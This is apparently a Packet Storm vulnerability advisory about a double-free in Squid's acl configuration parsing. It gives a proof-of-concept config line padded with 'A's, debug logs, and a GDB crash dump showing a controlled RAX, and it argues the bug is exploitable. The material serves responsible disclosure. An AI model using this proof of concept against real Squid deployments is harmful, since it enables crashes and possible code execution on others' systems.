Share
## https://sploitus.com/exploit?id=PACKETSTORM:161563
A Double-Free bug was found in Squid versions 4.14 and 5.0.5 when
processing the "acl" directive on configuration files, more
specifically the first and second addresses.
This may allow arbitrary code execution on a Squid deployment on where the
configuration files may be processed from untrusted sources.
The following sample configuration file causes the overflow:
# cat heap.conf
acl localnet src
1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16
This is the relevant debug output using "/usr/local/sbin/squid -f heap.conf
-N -X"
2021/02/09 11:25:10.856| 24,7| MemBlob.cc(130) syncSize: 5 was: 6
2021/02/09 11:25:10.856| 24,8| SBuf.cc(898) cow: SBuf113 no cow needed;
have 35
2021/02/09 11:25:10.856| 3,5| cache_cf.cc(533) parseOneConfigFile:
Processing: acl localnet src
1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16
2021/02/09 11:25:10.856| 28,9| Acl.cc(96) FindByName: ACL::FindByName
'localnet'
2021/02/09 11:25:10.856| 28,9| Acl.cc(102) FindByName: ACL::FindByName
found no match
2021/02/09 11:25:10.856| 28,3| Acl.cc(233) ParseAclLine: aclParseAclLine:
Creating ACL 'localnet'
2021/02/09 11:25:10.856| 28,4| Acl.cc(64) Make: src=0x555555e165d0
2021/02/09 11:25:10.856| 24,8| SBuf.cc(30) SBuf: SBuf253 created
2021/02/09 11:25:10.856| 24,8| SBuf.cc(30) SBuf: SBuf254 created
2021/02/09 11:25:10.856| 24,8| SBuf.cc(30) SBuf: SBuf255 created
2021/02/09 11:25:10.856| 24,8| SBuf.cc(70) ~SBuf: SBuf255 destructed
2021/02/09 11:25:10.856| 24,8| SBuf.cc(70) ~SBuf: SBuf254 destructed
2021/02/09 11:25:10.856| 24,8| SBuf.cc(70) ~SBuf: SBuf253 destructed
2021/02/09 11:25:10.856| 28,5| Ip.cc(222) FactoryParse: aclIpParseIpData:
1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16
2021/02/09 11:25:10.856| 28,9| Ip.cc(358) FactoryParse: aclIpParseIpData:
'1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16'
matched: non-IP pattern: %[^/]/%s
2021/02/09 11:25:10.856| 14,3| Address.cc(389) lookupHostIP: Given Non-IP
'1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0':
Name or service not known
2021/02/09 11:25:10.856| aclIpParseIpData: unknown first address in
'1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16'
Program received signal SIGSEGV, Segmentation fault.
0x0000555555af55e0 in Mem::AllocatorProxy::freeOne (this=<optimized out>,
address=0x555555e15e80) at AllocatorProxy.cc:22
22 getAllocator()->freeOne(address);
/home/aroldan/.gdbinit-gef.py:2425: DeprecationWarning: invalid escape
sequence '\Γ©'
res = gdb.Value(address).cast(char_ptr).string(encoding=encoding,
length=length).strip()
[ Legend: Modified register | Code | Heap | Stack | String ]
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
registers ββββ
$rax : 0x4141414141414141 ("AAAAAAAA"?)
$rbx : 0x0000555555c77f60 β 0x0000000900000009
$rcx : 0x0000555555dcd010 β 0x0003000200010004
$rdx : 0x39
$rsp : 0x00007fffffffe3c8 β 0x00005555558c4f93 β
<acl_ip_data::FactoryParse(char+0> call 0x555555709d10 <_Z13self_destructv>
$rbp : 0x0000555555e18da0 β
"1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$rsi : 0x0000555555e15e80 β 0x0000000000000000
$rdi : 0x4141414141414141 ("AAAAAAAA"?)
$rip : 0x0000555555af55e0 β <Mem::AllocatorProxy::freeOne(void*)+16>
mov rax, QWORD PTR [rax]
$r8 : 0x0
$r9 : 0x3b4
$r10 : 0x0000555555e19120 β 0x0000000000000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x0000555555d67aa0 β
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r14 : 0x0000555555e0a220 β 0x0000555555c49f98 β 0x00007ffff787ef20
β <std::__cxx11::basic_ostringstream<char,+0> mov rax, QWORD PTR
[rip+0x9e619] # 0x7ffff791d540
$r15 : 0x00007fffffffe450 β 0x0000555555b37e3e β "FactoryParse"
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow
RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
stack ββββ
0x00007fffffffe3c8β+0x0000: 0x00005555558c4f93 β
<acl_ip_data::FactoryParse(char+0> call 0x555555709d10
<_Z13self_destructv> β $rsp
0x00007fffffffe3d0β+0x0008: 0x000000000000003d ("="?)
0x00007fffffffe3d8β+0x0010: 0x00007fffffffe450 β 0x0000555555b37e3e β
"FactoryParse"
0x00007fffffffe3e0β+0x0018: 0x000000000000036e
0x00007fffffffe3e8β+0x0020: 0x0000555555b067d7 β <xstrndup+39> pop rbx
0x00007fffffffe3f0β+0x0028: 0x00007fffffffe47c β 0x55e17eae00000000
0x00007fffffffe3f8β+0x0030: 0x00007fffffffe480 β 0x0000555555e17eae β
0x0000000000000000
0x00007fffffffe400β+0x0038: 0x0000555555e15e80 β 0x0000000000000000
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
code:x86:64 ββββ
0x555555af55d9 <Mem::AllocatorProxy::freeOne(void*)+9> mov rsi, rbp
0x555555af55dc <Mem::AllocatorProxy::freeOne(void*)+12> pop rbp
0x555555af55dd <Mem::AllocatorProxy::freeOne(void*)+13> mov rdi, rax
β 0x555555af55e0 <Mem::AllocatorProxy::freeOne(void*)+16> mov rax,
QWORD PTR [rax]
0x555555af55e3 <Mem::AllocatorProxy::freeOne(void*)+19> mov rax,
QWORD PTR [rax+0x28]
0x555555af55e7 <Mem::AllocatorProxy::freeOne(void*)+23> jmp rax
0x555555af55e9 nop
0x555555af55ea nop WORD PTR [rax+rax*1+0x0]
0x555555af55f0 <Mem::AllocatorProxy::inUseCount()+0> mov rdi, QWORD
PTR [rdi+0x10]
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
source:AllocatorProxy.cc+22 ββββ
17 }
18
19 void
20 Mem::AllocatorProxy::freeOne(void *address)
21 {
β 22 getAllocator()->freeOne(address);
23 /* TODO: check for empty, and if so, if the default type has
altered,
24 * switch
25 */
26 }
27
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
threads ββββ
[#0] Id 1, Name: "squid", stopped 0x555555af55e0 in
Mem::AllocatorProxy::freeOne (), reason: SIGSEGV
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
trace ββββ
[#0] 0x555555af55e0 β Mem::AllocatorProxy::freeOne(this=<optimized out>,
address=0x555555e15e80)
[#1] 0x5555558c4f93 β acl_ip_data::operator delete(address=<optimized out>)
[#2] 0x5555558c4f93 β acl_ip_data::operator delete(address=<optimized out>)
[#3] 0x5555558c4f93 β acl_ip_data::FactoryParse(t=<optimized out>)
[#4] 0x5555558c68de β ACLIP::parse(this=0x555555e165d0)
[#5] 0x5555559052ff β ACL::ParseAclLine(parser=<optimized out>,
head=0x555555db9228 <Config+1320>)
[#6] 0x55555571b712 β parse_acl(ae=<optimized out>)
[#7] 0x55555571b712 β parse_line(buff=<optimized out>)
[#8] 0x55555572055f β parseOneConfigFile(file_name=0x555555ddf520
"heap.conf", depth=0x0)
[#9] 0x55555572127d β parseConfigFileOrThrow(file_name=0x555555ddf520
"heap.conf")
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
It can be easily exploitable too, because I control the value on RAX and
the execution stopped at
β 0x555555af55e0 <Mem::AllocatorProxy::freeOne(void*)+16> mov rax,
QWORD PTR [rax]
0x555555af55e3 <Mem::AllocatorProxy::freeOne(void*)+19> mov rax,
QWORD PTR [rax+0x28]
0x555555af55e7 <Mem::AllocatorProxy::freeOne(void*)+23> jmp rax
Environment information:
- Squid release version: Tested on 4.14 and 5.0.5
- Operating System type and version:
- Debian GNU/Linux bullseye/sid
- Compiled with gcc (Debian 10.2.1-6) 10.2.1 20210110
Timeline:
- 2021-02-08: Vulnerability discovered.
- 2021-02-09: Vendor contacted.
- 2021-02-10: Vendor replied asking to test for the vulnerability once
the patch is available.
- 2021-02-22: Vendor contacted again to check for updates.
- 2021-02-22: Vendor replied that, although this bug is not worth hiding
because of the nature of the exploitation environment.
- 2021-02-24: Public disclosure
References:
- https://fluidattacks.com/advisories/morrison/
--
AndrΓ©s RoldΓ‘n, +57-313-646-36-78
*___*
*| >>|> fluid|___| attacks, we hack your software*
--
Legal Notice <https://fluidattacks.com/web/terms-use/>